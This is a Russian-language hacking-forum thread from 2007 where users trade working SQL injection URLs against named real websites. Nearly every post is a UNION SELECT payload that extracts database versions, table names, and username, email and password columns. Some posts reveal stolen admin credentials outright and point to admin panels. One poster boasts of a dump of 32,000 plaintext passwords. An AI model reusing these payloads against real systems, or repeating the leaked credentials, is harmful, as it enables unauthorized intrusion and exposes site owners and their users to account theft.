SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Там вобще какая-то странная скуля =\

    НО :

     
    1 person likes this.
  2. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.stpatsfc.com/news.php?id=-1463+union+select+1,2,3,4,concat(password,0x3a,email),6+from+members/*
    http://stpatsfc.com/admin/ меня наверное глючит но на админке нету пароля:)))))))))
     
    2 people like this.
  3. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    clubclass04: pillocks
    Code:
    http://www.glidingteam.co.uk/competitions/2006/nzgrandprix/viewnewsarticle.php?id=-184+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15+from+users/*
    -
    Code:
    http://www.karmichaelhr.com/pages/viewnewsarticle.php?article=6+union+select+1,concat(database(),0x3a,version()),3,4/*
     
    #1703 random, 7 Apr 2007
    Last edited: 7 Apr 2007
  4. alextoun

    alextoun Вылет с Трассы

    Joined:
    7 May 2006
    Messages:
    563
    Likes Received:
    216
    Reputations:
    96
    сим-рейсинг
     
  5. alextoun

    alextoun Вылет с Трассы

    Joined:
    7 May 2006
    Messages:
    563
    Likes Received:
    216
    Reputations:
    96
    гы а я тут как то участвовал)) дальше не полезу, носков нету, а то забанят ещё)
     
  6. alextoun

    alextoun Вылет с Трассы

    Joined:
    7 May 2006
    Messages:
    563
    Likes Received:
    216
    Reputations:
    96
    в самом низу
     
  7. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.tass-ural.ru/news/?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
    http://www.tass-ural.ru/news/?id=-1+union+select+1,table_name+from+information_schema.tables+limit+52,1/*
    http://www.tass-ural.ru/news/?id=-1+union+select+1,table_name+from+information_schema.tables+limit+55,1/*
    http://www.tass-ural.ru/news/?id=-1+union+select+1,column_name+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114)+limit+0,1/*
    http://www.tass-ural.ru/news/?id=-1+union+select+1,convert(concat(id,char(58),fio,char(58),job),char)+from+member+limit+0,1/*
    Code:
    http://www.skladcd.com/?index=3&cat=4&cdinfo=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4/*
     
    1 person likes this.
  8. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.marycoughlanmusic.com/shop.php?id=-47%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12+from+admin/*
    чето нигде не выводит
     
    1 person likes this.
  9. alextoun

    alextoun Вылет с Трассы

    Joined:
    7 May 2006
    Messages:
    563
    Likes Received:
    216
    Reputations:
    96
    всё там нормально
     
  10. »Atom1c«

    »Atom1c« Banned

    Joined:
    4 Nov 2006
    Messages:
    234
    Likes Received:
    285
    Reputations:
    92
    Code:
    http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,VERSION(),9,10,11,12,13,14,15,16,17,18,19/*
    http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,DATABASE(),9,10,11,12,13,14,15,16,17,18,19/*
    http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,USER(),9,10,11,12,13,14,15,16,17,18,19/*
    Ярновасти...
     
    4 people like this.
  11. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.gapr.ru/RUS/news.php?newsID=100000000+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5/*
    http://www.gapr.ru/RUS/news.php?newsID=100000000+union+select+1,convert(concat(user,char(58),password),char),3,4,5+from+mysql.user+limit+0,1/*
    http://www.gapr.ru/RUS/news.php?newsID=100000000+union+select+1,convert(concat(id,char(58),email,char(58),passwd),char),3,4,5+from+user/*
     
    1 person likes this.
  12. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    www.internetua.com - украинский журнал об Интернете
    Code:
    http://www.internetua.com/vote/?v2=-1+union+select+1,2,3,4,5,6,7,8/*
    Админка
    Code:
    http://www.internetua.com/admin/
    Кто расковыряет дальше, отпишите..
     
    4 people like this.
  13. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    О, моя самая жирная скуля!!!

    Более 32 000 юзеров!
    Пасы без шифроовки!
    mail : pass


     
    3 people like this.
  14. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    to Goudini

    Code:
    http://www.internetua.com/vote/?v2=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(database(),char(58),user(),char(58),version()),0x71),0x71),3,4,5,6,7,8/*
    http://www.internetua.com/vote/?v2=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(table_name,0x71),0x71),3,4,5,6,7,8+from+information_schema.tables+limit+16,1/*
     
    2 people like this.
  15. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Code:
    http://www.phpvillage.org/member.php?idu=-1755+union+select+1,2,concat(version(),char(58),user()),4,5,6,7,8,9,10,11,12,13,14,15/*
    Code:
    http://www.x-cosmos.it/uffici/index.php?idU=-45+union+select+1,2/*
     
    3 people like this.
  16. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.vokrugsveta.ru/publishing/vs/archives/?item_id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11/*
    Code:
    http://www.metallomarket-m.ru/produkt.php?type_id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6/*
     
    3 people like this.
  17. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Code:
    http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,database(),4,5,6,7,8/*
    http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,user(),4,5,6,7,8/*
    http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,Version(),4,5,6,7,8/*
     
    3 people like this.
  18. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    www.rssmix.com/

    Code:
    http://www.rssmix.com/engine.php?mix_id=-20476/**/union/**/select/**/concat(user,0x3a,password)/**/from+mysql.user/*
    Пасса походу нет =\
     
    1 person likes this.
  19. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    HTML:
    http://gta.com.ua/file_details.phtml?id=-802+union+select+1,2,3,concat(user(),char(58),database(),char(58),version()),5,6,7,username,password,10,11,12,13,14,15,16,17,18,19,20+from+admin/*
    username == admin
    password == 2IsfJILPkOJ2
    user == gtacom_gta@localhost
    database == gtacom_gta
    version == 4.1.21-standard

    Хз где админка можно залесть так:
    http://domen.com.ua/
    Только нужен id :(


    Тур агентство.

    HTML:
    http://sputnik.kiev.ua/catalog/index.php?turs=18&id_c=-33+union+select+1,concat(version(),char(58),user(),char(58),database())/*
     
    #1719 V.I.P, 7 Apr 2007
    Last edited: 7 Apr 2007
    2 people like this.
  20. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    __:)__
     
    2 people like this.
Thread Status:
Not open for further replies.